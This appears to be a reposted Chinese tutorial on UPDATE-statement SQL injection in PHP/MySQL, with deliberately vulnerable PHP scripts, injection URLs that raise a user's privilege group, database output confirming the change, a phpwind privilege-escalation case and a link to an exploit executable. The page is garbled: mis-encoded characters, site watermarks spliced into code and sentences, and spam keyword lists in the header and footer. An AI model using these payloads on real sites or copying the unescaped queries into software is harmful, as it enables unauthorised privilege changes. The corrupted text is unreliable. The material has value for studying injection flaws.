国产成人精品亚洲777人妖,欧美日韩精品一区视频,最新亚洲国产,国产乱码精品一区二区亚洲

您的位置:首頁(yè)技術(shù)文章
文章詳情頁(yè)

UPDATE注射(mysql+php)的兩個(gè)模式

瀏覽:6日期:2024-01-09 08:56:31

本文作者:SuperHei文章性質(zhì):原創(chuàng)發(fā)布日期:2005-08-14

一、測(cè)試環(huán)境網(wǎng)管下載dl.bitscn.com

OS: Windowsxp sp2php: php 4.3.10mysql 4.1.9apache 1.3.33

二、測(cè)試數(shù)據(jù)庫(kù)結(jié)構(gòu)

-- 數(shù)據(jù)庫(kù): `test`--

-- --------------------------------------------------------

---- 表的結(jié)構(gòu) `userinfo`--網(wǎng)管網(wǎng)www_bitscn_com

CREATE TABLE `userinfo` (`groudid` varchar(12) NOT NULL default '1',`user` varchar(12) NOT NULL default 'heige',`pass` varchar(122) NOT NULL default '123456') TYPE=MyISAM DEFAULT CHARSET=utf8;網(wǎng)管u家u.bitsCN.com

---- 導(dǎo)出表中的數(shù)據(jù) `userinfo`--

INSERT INTO `userinfo` VALUES ('2', 'heige', '123456')

三、測(cè)試模式

1、變量沒有帶''或''中國(guó)網(wǎng)管聯(lián)盟bitsCN.com

<?php//test1.php Mod1$servername = 'localhost';$dbusername = 'root';$dbpassword = '';$dbname = 'test';

mysql_connect($servername,$dbusername,$dbpassword) or die ('數(shù)據(jù)庫(kù)連接失敗');中國(guó)網(wǎng)管論壇bbs.bitsCN.com

$sql = 'update userinfo set pass=$p where user='heige'';//<--$P沒有使用單引號(hào)

$result = mysql_db_query($dbname, $sql);$userinfo = mysql_fetch_array($result);中國(guó)網(wǎng)管論壇bbs.bitsCN.com

echo '<p>SQL Query:$sql<p>';?>

腳本里只是修改 user='heige' 的 pass,如果 groudid 表示用戶的權(quán)限等級(jí),我們的目的就是通過構(gòu)造 $p 來達(dá)到修改 groupid 的目的,那么我們提交:

http://127.0.0.1/test1.php?p=123456,groudid=1

在mysql里查詢:

mysql> select * from userinfo;+---------+-------+--------+| groudid | user | pass |+---------+-------+--------+| 1 | heige | 123456 |+---------+-------+--------+1 row in set (0.01 sec)

用戶heige的groudid又2改為1了 :)

所以我們可以得到?jīng)]有''或''update的注射是可以成功的,這個(gè)就是我們的模式1。

2、變量帶''或''

<?php//test2.php$servername = 'localhost';$dbusername = 'root';$dbpassword = '';$dbname = 'test';

mysql_connect($servername,$dbusername,$dbpassword) or die ('數(shù)據(jù)庫(kù)連接失敗');

$sql = 'update userinfo set pass='$p' where user='heige'';//<--$P使用單引號(hào)中國(guó)網(wǎng)管論壇bbs.bitsCN.com

$result = mysql_db_query($dbname, $sql);$userinfo = mysql_fetch_array($result);網(wǎng)管論壇bbs_bitsCN_com

echo '<p>SQL Query:$sql<p>';?>

為了關(guān)閉'我們構(gòu)造$p應(yīng)該為123456',groudid='2提交:中國(guó)網(wǎng)管論壇bbs.bitsCN.com

http://127.0.0.1/test2.php?p=123456',groudid='1

在gpc=on的情況下'變成了',提交的語(yǔ)句變成:

SQL Query:update userinfo set pass='123456',groudid='1' where user='heige'

mysql查詢:

mysql> select * from userinfo;+---------+-------+--------------------+| groudid | user | pass |+---------+-------+--------------------+| 2 | heige | 123456',groudid='1 |+---------+-------+--------------------+1 row in set (0.00 sec)網(wǎng)管bitscn_com

groudid并沒有被修改。那么在變量被''或''時(shí) 就完全沒有被注射呢?不是 下面我們看模式2:

<?php//test3.php Mod2$servername = 'localhost';$dbusername = 'root';$dbpassword = '';$dbname = 'test';

mysql_connect($servername,$dbusername,$dbpassword) or die ('數(shù)據(jù)庫(kù)連接失敗');

$sql = 'update userinfo set pass='$p' where user='heige'';//<--$P使用單引號(hào)網(wǎng)管u家u.bitscn@com

$result = mysql_db_query($dbname, $sql);mysql_fetch_array($result); //$p的數(shù)據(jù)寫入數(shù)據(jù)庫(kù)

$sql= 'select pass from userinfo where user='heige'';$result = mysql_db_query($dbname, $sql);$userinfo=mysql_fetch_array($result);

echo $userinfo[0]; //把pass查詢輸出給$userinfo[0]

$sql ='update userinfo set pass='$userinfo[0]' where user='heige'';$result = mysql_db_query($dbname, $sql);mysql_fetch_array($result); //把$userinfo[0] 再次update中國(guó)網(wǎng)管聯(lián)盟bitsCN.com

?>

我們測(cè)試下,提交:網(wǎng)管bitscn_com

http://127.0.0.1/test3.php?p=123456',groudid='1

回mysql查詢下 :網(wǎng)管論壇bbs_bitsCN_com

mysql> select * from userinfo;+---------+-------+--------+| groudid | user | pass |+---------+-------+--------+| 1 | heige | 123456 |+---------+-------+--------+1 row in set (0.00 sec)

HaHa~~ 成功注射 修改groudid為1。 這個(gè)就是我們的模式2了,簡(jiǎn)單的描敘如下:

update --> select --> update

四、實(shí)際模式

模式1:缺

模式2:phpwind 2.0.2和3.31e 權(quán)限提升漏洞

漏洞分析

update (profile.php 注射變量為$proicon update語(yǔ)句里為,icon='$userdb[icon]')↓select (jop.php)↓updtate (jop.php)網(wǎng)管論壇bbs_bitsCN_com

Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe

五、鳴謝

特別感謝saiy等朋友的討論和幫助。Thanks!!

標(biāo)簽: PHP
主站蜘蛛池模板: 合山市| 吉林省| 南和县| 苏尼特左旗| 枞阳县| 灌南县| 梁山县| 毕节市| 宣威市| 沭阳县| 古田县| 沙雅县| 龙里县| 永登县| 明光市| 维西| 邵阳市| 长兴县| 天水市| 南召县| 新龙县| 承德县| 万荣县| 霸州市| 和田县| 昌都县| 龙门县| 防城港市| 潞西市| 阿拉善右旗| 恩平市| 三台县| 阜宁县| 新野县| 富川| 睢宁县| 京山县| 紫云| 环江| 天峻县| 磴口县|